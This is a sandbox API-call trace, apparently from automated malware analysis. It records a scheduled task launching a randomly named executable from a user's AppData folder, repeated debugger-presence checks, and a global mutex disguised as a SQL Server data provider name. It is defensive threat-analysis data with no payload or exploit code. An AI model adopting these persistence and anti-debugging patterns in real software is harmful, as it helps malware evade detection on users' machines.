[0169.886] CloseHandle (hObject=0x1864) returned 1 [0169.887] CloseHandle (hObject=0x1a70) returned 1 [0169.887] CloseHandle (hObject=0x4b78) returned 1 [0169.887] CloseHandle (hObject=0x5bdc) returned 1 [0169.887] CloseHandle (hObject=0x423c) returned 1 [0169.887] CloseHandle (hObject=0xb178) returned 1 [0169.887] CloseHandle (hObject=0xb894) returned 1 [0169.887] CloseHandle (hObject=0xc1c8) returned 1 [0169.887] CloseHandle (hObject=0x3734) returned 1 [0169.887] CloseHandle (hObject=0xec0) returned 1 [0169.887] CloseHandle (hObject=0x2380) returned 1 [0169.888] CloseHandle (hObject=0x2e6c) returned 1 [0169.888] CloseHandle (hObject=0x2fa0) returned 1 [0169.888] CloseHandle (hObject=0x1760) returned 1 [0169.888] CloseHandle (hObject=0xac3c) returned 1 [0169.888] CloseHandle (hObject=0x12f8) returned 1 [0169.888] CloseHandle (hObject=0x131ec) returned 1 [0169.888] CloseHandle (hObject=0x5810) returned 1 [0169.888] CloseHandle (hObject=0x4020) returned 1 [0169.888] CloseHandle (hObject=0x1318) returned 1 [0169.889] CloseHandle (hObject=0x2ff0) returned 1 [0169.889] CloseHandle (hObject=0x105a0) returned 1 [0169.889] CloseHandle (hObject=0x19f0) returned 1 [0169.889] CloseHandle (hObject=0x1a18) returned 1 [0169.889] CloseHandle (hObject=0x301c) returned 1 [0169.889] CloseHandle (hObject=0xc754) returned 1 [0169.889] CloseHandle (hObject=0x3030) returned 1 [0169.889] CloseHandle (hObject=0x10034) returned 1 [0169.889] CloseHandle (hObject=0x11d60) returned 1 [0169.889] CloseHandle (hObject=0xae68) returned 1 [0169.890] CloseHandle (hObject=0x3a98) returned 1 [0169.890] CloseHandle (hObject=0x18a8) returned 1 [0169.890] CloseHandle (hObject=0x5b68) returned 1 [0169.890] CloseHandle (hObject=0x228c) returned 1 [0169.890] CloseHandle (hObject=0xca18) returned 1 [0169.890] CloseHandle (hObject=0x4118) returned 1 [0169.890] CloseHandle (hObject=0x125f4) returned 1 [0169.890] CloseHandle (hObject=0xf9ec) returned 1 [0169.890] CloseHandle (hObject=0x2288) returned 1 [0169.890] CloseHandle (hObject=0x1584) returned 1 [0169.890] CloseHandle (hObject=0x52a0) returned 1 [0169.891] CloseHandle (hObject=0x348c) returned 1 [0169.891] CloseHandle (hObject=0x10194) returned 1 [0169.891] CloseHandle (hObject=0xf3c) returned 1 [0169.891] CloseHandle (hObject=0x13178) returned 1 [0169.891] CloseHandle (hObject=0x2c94) returned 1 [0169.891] CloseHandle (hObject=0x4fb0) returned 1 [0169.891] CloseHandle (hObject=0x5c2c) returned 1 [0169.891] CloseHandle (hObject=0xbe20) returned 1 [0169.891] CloseHandle (hObject=0x4fc0) returned 1 [0169.891] CloseHandle (hObject=0x36c4) returned 1 [0169.892] CloseHandle (hObject=0x52e4) returned 1 [0169.892] CloseHandle (hObject=0xf558) returned 1 [0169.892] CloseHandle (hObject=0xa9cc) returned 1 [0169.892] CloseHandle (hObject=0x1dd8) returned 1 [0169.892] CloseHandle (hObject=0x5478) returned 1 [0169.892] CloseHandle (hObject=0xa534) returned 1 [0169.892] CloseHandle (hObject=0x120d4) returned 1 [0169.892] CloseHandle (hObject=0x4ec) returned 1 [0169.892] CloseHandle (hObject=0x105c0) returned 1 [0169.892] CloseHandle (hObject=0xada8) returned 1 [0169.893] CloseHandle (hObject=0xaa7c) returned 1 [0169.893] CloseHandle (hObject=0x136e8) returned 1 [0169.893] CloseHandle (hObject=0x2c10) returned 1 [0169.893] CloseHandle (hObject=0x4508) returned 1 [0169.893] CloseHandle (hObject=0x1de8) returned 1 [0169.893] CloseHandle (hObject=0x22e4) returned 1 [0169.893] CloseHandle (hObject=0xb1f8) returned 1 [0169.893] CloseHandle (hObject=0x2b60) returned 1 [0169.893] CloseHandle (hObject=0x3d30) returned 1 [0169.893] CloseHandle (hObject=0x23d0) returned 1 [0169.893] CloseHandle (hObject=0x1045c) returned 1 [0169.894] CloseHandle (hObject=0x14350) returned 1 [0169.894] CloseHandle (hObject=0x24c0) returned 1 [0169.894] CloseHandle (hObject=0x43d8) returned 1 [0169.894] CloseHandle (hObject=0xb984) returned 1 [0169.894] CloseHandle (hObject=0x13628) returned 1 [0169.894] CloseHandle (hObject=0xaad4) returned 1 [0169.894] CloseHandle (hObject=0xf644) returned 1 [0169.894] CloseHandle (hObject=0xf658) returned 1 [0169.894] CloseHandle (hObject=0xac04) returned 1 [0169.894] CloseHandle (hObject=0xb4c8) returned 1 [0169.895] CloseHandle (hObject=0xbe74) returned 1 [0169.895] CloseHandle (hObject=0x210c) returned 1 [0169.895] CloseHandle (hObject=0x50bc) returned 1 [0169.895] CloseHandle (hObject=0x4e4c) returned 1 [0169.895] CloseHandle (hObject=0x1c60) returned 1 [0169.895] CloseHandle (hObject=0x1c74) returned 1 [0169.895] CloseHandle (hObject=0x3a28) returned 1 [0169.895] CloseHandle (hObject=0x109a0) returned 1 [0169.895] CloseHandle (hObject=0x16e4) returned 1 [0169.895] CloseHandle (hObject=0x13bfc) returned 1 [0169.896] CloseHandle (hObject=0x2920) returned 1 [0169.896] CloseHandle (hObject=0x10374) returned 1 [0169.896] CloseHandle (hObject=0xa6a4) returned 1 [0169.896] CloseHandle (hObject=0x11dd0) returned 1 [0169.896] CloseHandle (hObject=0xc858) returned 1 [0169.896] CloseHandle (hObject=0x2cb4) returned 1 [0169.896] CloseHandle (hObject=0x3a10) returned 1 [0169.896] CloseHandle (hObject=0x17e0) returned 1 [0169.896] CloseHandle (hObject=0x282c) returned 1 [0169.896] CloseHandle (hObject=0x4750) returned 1 [0169.896] CloseHandle (hObject=0x4b40) returned 1 [0169.897] CloseHandle (hObject=0x53d8) returned 1 [0169.897] CloseHandle (hObject=0x20c8) returned 1 [0169.897] CloseHandle (hObject=0xbc20) returned 1 [0169.897] CloseHandle (hObject=0x1200) returned 1 [0169.897] CloseHandle (hObject=0xb4bc) returned 1 [0169.897] CloseHandle (hObject=0x4f94) returned 1 [0169.897] CloseHandle (hObject=0xab00) returned 1 [0169.897] CloseHandle (hObject=0x4a1c) returned 1 [0169.897] CloseHandle (hObject=0xc7d4) returned 1 [0169.897] CloseHandle (hObject=0x100b4) returned 1 [0169.897] CloseHandle (hObject=0xf684) returned 1 [0169.898] CloseHandle (hObject=0x838) returned 1 [0169.898] CloseHandle (hObject=0x12848) returned 1 [0169.898] CloseHandle (hObject=0x20fc) returned 1 [0169.898] CloseHandle (hObject=0x2eb0) returned 1 [0169.898] CloseHandle (hObject=0x591c) returned 1 [0169.898] CloseHandle (hObject=0x229c) returned 1 [0169.898] CloseHandle (hObject=0x125d8) returned 1 [0169.898] CloseHandle (hObject=0xfcb4) returned 1 [0169.898] CloseHandle (hObject=0x139c) returned 1 [0169.898] CloseHandle (hObject=0x38bc) returned 1 [0169.899] CloseHandle (hObject=0x2ac) returned 1 [0169.899] CloseHandle (hObject=0x4e78) returned 1 [0169.899] CloseHandle (hObject=0xfacc) returned 1 [0169.899] CloseHandle (hObject=0x12030) returned 1 [0169.899] CloseHandle (hObject=0x5b8) returned 1 [0169.899] CloseHandle (hObject=0x1ca0) returned 1 [0169.899] CloseHandle (hObject=0x608) returned 1 [0169.899] CloseHandle (hObject=0x630) returned 1 [0169.899] CloseHandle (hObject=0x11fac) returned 1 [0173.628] SetWindowLongW (hWnd=0x10150, nIndex=-4, dwNewLong=1996301789) returned 77007038 [0173.629] SetClassLongW (hWnd=0x10150, nIndex=-24, dwNewLong=1996301789) returned 0x4970896 [0173.629] PostMessageW (hWnd=0x10150, Msg=0x10, wParam=0x0, lParam=0x0) returned 1 [0173.796] GetModuleHandleW (lpModuleName=0x0) returned 0x1380000 [0173.796] UnregisterClassW (lpClassName="WindowsForms10.Window.8.app.0.3917f2_r14_ad1", hInstance=0x1380000) returned 0 [0173.860] LocalFree (hMem=0x7855b0) returned 0x0 [0173.860] LocalFree (hMem=0x785528) returned 0x0 [0173.883] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ade2c4, cbSid=0x102f54c | out: pSid=0x2ade2c4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x102f54c) returned 1 [0173.884] CreateMutexW (lpMutexAttributes=0x2ade3a0, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x1024 [0173.884] WaitForSingleObject (hHandle=0x1024, dwMilliseconds=0x1f4) returned 0x0 [0173.884] ReleaseMutex (hMutex=0x1024) returned 1 [0173.884] CloseHandle (hObject=0x1024) returned 1 [0173.884] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ade5bc, cbSid=0x102f54c | out: pSid=0x2ade5bc*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x102f54c) returned 1 [0173.885] CreateMutexW (lpMutexAttributes=0x2ade698, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x1024 [0173.885] WaitForSingleObject (hHandle=0x1024, dwMilliseconds=0x1f4) returned 0x0 [0173.885] ReleaseMutex (hMutex=0x1024) returned 1 [0173.885] CloseHandle (hObject=0x1024) returned 1 [0173.885] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2ade8b4, cbSid=0x102f54c | out: pSid=0x2ade8b4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x102f54c) returned 1 [0173.885] CreateMutexW (lpMutexAttributes=0x2ade990, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x1024 [0173.885] WaitForSingleObject (hHandle=0x1024, dwMilliseconds=0x1f4) returned 0x0 [0173.886] ReleaseMutex (hMutex=0x1024) returned 1 [0173.886] CloseHandle (hObject=0x1024) returned 1 [0173.886] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2adebac, cbSid=0x102f54c | out: pSid=0x2adebac*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x102f54c) returned 1 [0173.886] CreateMutexW (lpMutexAttributes=0x2adec88, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x1024 [0173.886] WaitForSingleObject (hHandle=0x1024, dwMilliseconds=0x1f4) returned 0x0 [0173.886] ReleaseMutex (hMutex=0x1024) returned 1 [0173.886] CloseHandle (hObject=0x1024) returned 1 [0173.887] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2adeea4, cbSid=0x102f54c | out: pSid=0x2adeea4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x102f54c) returned 1 [0173.887] CreateMutexW (lpMutexAttributes=0x2adef80, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x1024 [0173.887] WaitForSingleObject (hHandle=0x1024, dwMilliseconds=0x1f4) returned 0x0 [0173.887] ReleaseMutex (hMutex=0x1024) returned 1 [0173.887] CloseHandle (hObject=0x1024) returned 1 [0173.887] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2adf19c, cbSid=0x102f54c | out: pSid=0x2adf19c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x102f54c) returned 1 [0173.887] CreateMutexW (lpMutexAttributes=0x2adf278, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x1024 [0173.888] WaitForSingleObject (hHandle=0x1024, dwMilliseconds=0x1f4) returned 0x0 [0173.888] ReleaseMutex (hMutex=0x1024) returned 1 [0173.888] CloseHandle (hObject=0x1024) returned 1 [0173.888] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2adf494, cbSid=0x102f54c | out: pSid=0x2adf494*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x102f54c) returned 1 [0173.888] CreateMutexW (lpMutexAttributes=0x2adf570, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x1024 [0173.888] WaitForSingleObject (hHandle=0x1024, dwMilliseconds=0x1f4) returned 0x0 [0173.888] ReleaseMutex (hMutex=0x1024) returned 1 [0173.888] CloseHandle (hObject=0x1024) returned 1 [0173.889] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2adf78c, cbSid=0x102f54c | out: pSid=0x2adf78c*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x102f54c) returned 1 [0173.889] CreateMutexW (lpMutexAttributes=0x2adf868, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x1024 [0173.889] WaitForSingleObject (hHandle=0x1024, dwMilliseconds=0x1f4) returned 0x0 [0173.889] ReleaseMutex (hMutex=0x1024) returned 1 [0173.889] CloseHandle (hObject=0x1024) returned 1 [0173.889] CreateWellKnownSid (in: WellKnownSidType=0x11, DomainSid=0x0, pSid=0x2adfa84, cbSid=0x102f54c | out: pSid=0x2adfa84*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0xb), cbSid=0x102f54c) returned 1 [0173.889] CreateMutexW (lpMutexAttributes=0x2adfb60, bInitialOwner=0, lpName="Global\\.net data provider for sqlserver") returned 0x1024 [0173.889] WaitForSingleObject (hHandle=0x1024, dwMilliseconds=0x1f4) returned 0x0 [0173.890] ReleaseMutex (hMutex=0x1024) returned 1 [0173.890] CloseHandle (hObject=0x1024) returned 1 [0173.890] EtwEventUnregister () returned 0x0 [0173.899] GdipDeleteFont (font=0x54e2940) returned 0x0 [0173.908] CloseHandle (hObject=0x304) returned 1 [0173.910] GdipDisposeImage (image=0x548fcf0) returned 0x0 [0173.920] CloseHandle (hObject=0x106a8) returned 1 [0173.920] UnmapViewOfFile (lpBaseAddress=0x4b0000) returned 1 [0173.921] CloseHandle (hObject=0x2c8) returned 1 [0173.922] RegCloseKey (hKey=0x80000004) returned 0x0 [0173.922] CloseHandle (hObject=0x34b8) returned 1 [0173.923] CloseHandle (hObject=0x4f40) returned 1 [0173.923] CloseHandle (hObject=0x5458) returned 1 [0173.925] SleepEx (dwMilliseconds=0xffffffff, bAlertable=0) Thread: id = 102 os_tid = 0x480 Thread: id = 151 os_tid = 0x46c [0156.594] CoGetContextToken (in: pToken=0x522fd4c | out: pToken=0x522fd4c) returned 0x0 [0156.602] CObjectContext::QueryInterface () returned 0x0 [0156.602] CObjectContext::GetCurrentThreadType () returned 0x0 [0156.602] Release () returned 0x0 [0156.607] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0156.607] SleepEx (dwMilliseconds=0xffffffff, bAlertable=1) returned 0xc0 [0156.608] SleepEx (dwMilliseconds=0x3a980, bAlertable=1) returned 0x0 [0166.641] SleepEx (dwMilliseconds=0x38261, bAlertable=1) Thread: id = 152 os_tid = 0x134 Thread: id = 158 os_tid = 0x5d0 Thread: id = 159 os_tid = 0x620 [0170.556] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0170.677] SleepEx (dwMilliseconds=0x1f4, bAlertable=1) returned 0x0 [0171.180] IsDebuggerPresent () returned 0 [0171.188] GetCurrentProcessId () returned 0x530 [0171.188] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x5458 [0171.188] GetExitCodeProcess (in: hProcess=0x5458, lpExitCode=0x2aa7aa0 | out: lpExitCode=0x2aa7aa0*=0x103) returned 1 [0171.204] CloseHandle (hObject=0x5458) returned 1 [0171.204] OutputDebugStringW (lpOutputString="") [0171.226] CloseHandle (hObject=0x0) returned 0 [0171.227] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0172.286] IsDebuggerPresent () returned 0 [0172.286] GetCurrentProcessId () returned 0x530 [0172.286] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x5548 [0172.287] GetExitCodeProcess (in: hProcess=0x5548, lpExitCode=0x2ab2200 | out: lpExitCode=0x2ab2200*=0x103) returned 1 [0172.287] CloseHandle (hObject=0x5548) returned 1 [0172.287] OutputDebugStringW (lpOutputString="") [0172.288] CloseHandle (hObject=0x0) returned 0 [0172.288] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0173.562] IsDebuggerPresent () returned 0 [0173.562] GetCurrentProcessId () returned 0x530 [0173.562] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0xa728 [0173.562] GetExitCodeProcess (in: hProcess=0xa728, lpExitCode=0x2acd794 | out: lpExitCode=0x2acd794*=0x103) returned 1 [0173.562] CloseHandle (hObject=0xa728) returned 1 [0173.562] OutputDebugStringW (lpOutputString="") [0173.562] CloseHandle (hObject=0x0) returned 0 [0173.562] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) Thread: id = 160 os_tid = 0x360 [0170.671] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0170.676] IsDebuggerPresent () returned 0 [0170.676] GetCurrentProcessId () returned 0x530 [0170.676] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0xfe34 [0170.676] GetExitCodeProcess (in: hProcess=0xfe34, lpExitCode=0x2b252cc | out: lpExitCode=0x2b252cc*=0x103) returned 1 [0170.701] CloseHandle (hObject=0xfe34) returned 1 [0170.708] OutputDebugStringW (lpOutputString="") [0170.714] CloseHandle (hObject=0x0) returned 0 [0170.714] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0171.772] IsDebuggerPresent () returned 0 [0171.772] GetCurrentProcessId () returned 0x530 [0171.772] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0xbebc [0171.772] GetExitCodeProcess (in: hProcess=0xbebc, lpExitCode=0x2ab2108 | out: lpExitCode=0x2ab2108*=0x103) returned 1 [0171.773] CloseHandle (hObject=0xbebc) returned 1 [0171.773] OutputDebugStringW (lpOutputString="") [0171.773] CloseHandle (hObject=0x0) returned 0 [0171.773] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) returned 0x0 [0172.827] IsDebuggerPresent () returned 0 [0172.827] GetCurrentProcessId () returned 0x530 [0172.827] OpenProcess (dwDesiredAccess=0x1f0fff, bInheritHandle=0, dwProcessId=0x530) returned 0x3cfc [0172.827] GetExitCodeProcess (in: hProcess=0x3cfc, lpExitCode=0x2ab29d0 | out: lpExitCode=0x2ab29d0*=0x103) returned 1 [0172.827] CloseHandle (hObject=0x3cfc) returned 1 [0172.827] OutputDebugStringW (lpOutputString="") [0172.828] CloseHandle (hObject=0x0) returned 0 [0172.828] SleepEx (dwMilliseconds=0x3e8, bAlertable=1) Thread: id = 161 os_tid = 0x364 Thread: id = 162 os_tid = 0x35c Thread: id = 164 os_tid = 0x66c Thread: id = 167 os_tid = 0x71c [0173.563] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0173.582] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x39526e8, Length=0x20000, ResultLength=0xb9bf684 | out: SystemInformation=0x39526e8, ResultLength=0xb9bf684*=0x7e80) returned 0x0 [0173.593] SleepEx (dwMilliseconds=0x7d0, bAlertable=1) Thread: id = 168 os_tid = 0x688 [0173.927] SleepEx (dwMilliseconds=0x14, bAlertable=0) Process: id = "8" image_name = "taskeng.exe" filename = "c:\\windows\\system32\\taskeng.exe" page_root = "0x22d18000" os_pid = "0x624" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "created_scheduled_job" parent_id = "2" os_parent_pid = "0x374" cmd_line = "taskeng.exe {5173781C-5635-4A14-ADC2-C5783756E36D} S-1-5-21-3388679973-3930757225-3770151564-1000:XDUWTFONO\\5p5NrGJn0jS HALPmcxz:Interactive:LUA[1]" cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e51c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 32 os_tid = 0x628 Thread: id = 33 os_tid = 0x638 Thread: id = 34 os_tid = 0x640 Thread: id = 35 os_tid = 0x644 Thread: id = 36 os_tid = 0x64c Thread: id = 37 os_tid = 0x650 Thread: id = 38 os_tid = 0x670 Thread: id = 224 os_tid = 0x560 Process: id = "9" image_name = "chfiqxtpqp.exe" filename = "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\chfiqxtpqp.exe" page_root = "0x74a19000" os_pid = "0x678" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "8" os_parent_pid = "0x624" cmd_line = "\"C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XDUWTFONO\\5p5NrGJn0jS HALPmcxz" bitness = "32" os_groups = "XDUWTFONO\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e51c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 59 os_tid = 0x67c [0154.288] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0158.079] GetFullPathNameW (in: lpFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", nBufferLength=0x105, lpBuffer=0x4de8ac, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\Microsoft.Net\\assembly\\GAC_MSIL\\System.Windows.Forms\\v4.0_4.0.0.0__b77a5c561934e089\\System.Windows.Forms.dll", lpFilePart=0x0) returned 0x77 [0158.091] IsAppThemed () returned 0x1 [0158.092] CoTaskMemAlloc (cb=0xf0) returned 0x798568 [0158.093] CreateActCtxA (pActCtx=0x4deda8) returned 0x79875c [0158.095] CoTaskMemFree (pv=0x798568) [0158.101] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLNAME") returned 0xc11e [0158.101] RegisterClipboardFormatW (lpszFormat="WM_GETCONTROLTYPE") returned 0xc11f [0158.402] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe.config", nBufferLength=0x105, lpBuffer=0x4de74c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe.config", lpFilePart=0x0) returned 0x43 [0158.402] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe.config", nBufferLength=0x105, lpBuffer=0x4de6f8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe.config", lpFilePart=0x0) returned 0x43 [0158.408] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", nBufferLength=0x105, lpBuffer=0x4de754, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", lpFilePart=0x0) returned 0x3c [0158.408] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", nBufferLength=0x105, lpBuffer=0x4de6cc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", lpFilePart=0x0) returned 0x3c [0158.409] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", nBufferLength=0x105, lpBuffer=0x4de724, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", lpFilePart=0x0) returned 0x3c [0158.410] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x4deb84) returned 1 [0158.411] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\chfiqxtpqp.exe"), fInfoLevelId=0x0, lpFileInformation=0x4dec00 | out: lpFileInformation=0x4dec00*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x717ab990, ftCreationTime.dwHighDateTime=0x1d6a092, ftLastAccessTime.dwLowDateTime=0x717ab990, ftLastAccessTime.dwHighDateTime=0x1d6a092, ftLastWriteTime.dwLowDateTime=0x7181ddb0, ftLastWriteTime.dwHighDateTime=0x1d6a092, nFileSizeHigh=0x0, nFileSizeLow=0xb7400)) returned 1 [0158.411] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x4deb80) returned 1 [0158.412] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", lpdwHandle=0x4dec74 | out: lpdwHandle=0x4dec74) returned 0x6ac [0158.413] GetFileVersionInfoW (in: lptstrFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\ChFIQxtpqP.exe", dwHandle=0x0, dwLen=0x6ac, lpData=0x2208fa8 | out: lpData=0x2208fa8) returned 1 [0158.414] VerQueryValueW (in: pBlock=0x2208fa8, lpSubBlock="\\VarFileInfo\\Translation", lplpBuffer=0x4dec48, puLen=0x4dec44 | out: lplpBuffer=0x4dec48*=0x2209044, puLen=0x4dec44) returned 1 [0158.417] VerQueryValueW (in: pBlock=0x2208fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\CompanyName", lplpBuffer=0x4debc8, puLen=0x4debc4 | out: lplpBuffer=0x4debc8*=0x22090e4, puLen=0x4debc4) returned 1 [0158.417] VerQueryValueW (in: pBlock=0x2208fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileDescription", lplpBuffer=0x4debc8, puLen=0x4debc4 | out: lplpBuffer=0x4debc8*=0x2209114, puLen=0x4debc4) returned 1 [0158.417] VerQueryValueW (in: pBlock=0x2208fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\FileVersion", lplpBuffer=0x4debc8, puLen=0x4debc4 | out: lplpBuffer=0x4debc8*=0x2209148, puLen=0x4debc4) returned 1 [0158.417] VerQueryValueW (in: pBlock=0x2208fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\InternalName", lplpBuffer=0x4debc8, puLen=0x4debc4 | out: lplpBuffer=0x4debc8*=0x220917c, puLen=0x4debc4) returned 1 [0158.417] VerQueryValueW (in: pBlock=0x2208fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\LegalCopyright", lplpBuffer=0x4debc8, puLen=0x4debc4 | out: lplpBuffer=0x4debc8*=0x22091b0, puLen=0x4debc4) returned 1 [0158.417] VerQueryValueW (in: pBlock=0x2208fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\OriginalFilename", lplpBuffer=0x4debc8, puLen=0x4debc4 | out: lplpBuffer=0x4debc8*=0x2209244, puLen=0x4debc4) returned 1 [0158.417] VerQueryValueW (in: pBlock=0x2208fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductName", lplpBuffer=0x4debc8, puLen=0x4debc4 | out: lplpBuffer=0x4debc8*=0x2209274, puLen=0x4debc4) returned 1 [0158.418] VerQueryValueW (in: pBlock=0x2208fa8, lpSubBlock="\\\\StringFileInfo\\\\000004B0\\\\ProductVersion", lplpBuffer=0x4debc8, puLen=0x4debc4 | out: lplpBuffer=0x4debc8*=0x22092ac, puLen=0x4debc4) returned 1 [0158.418] VerQueryValueW (in: pBlock=0x2208fa8, 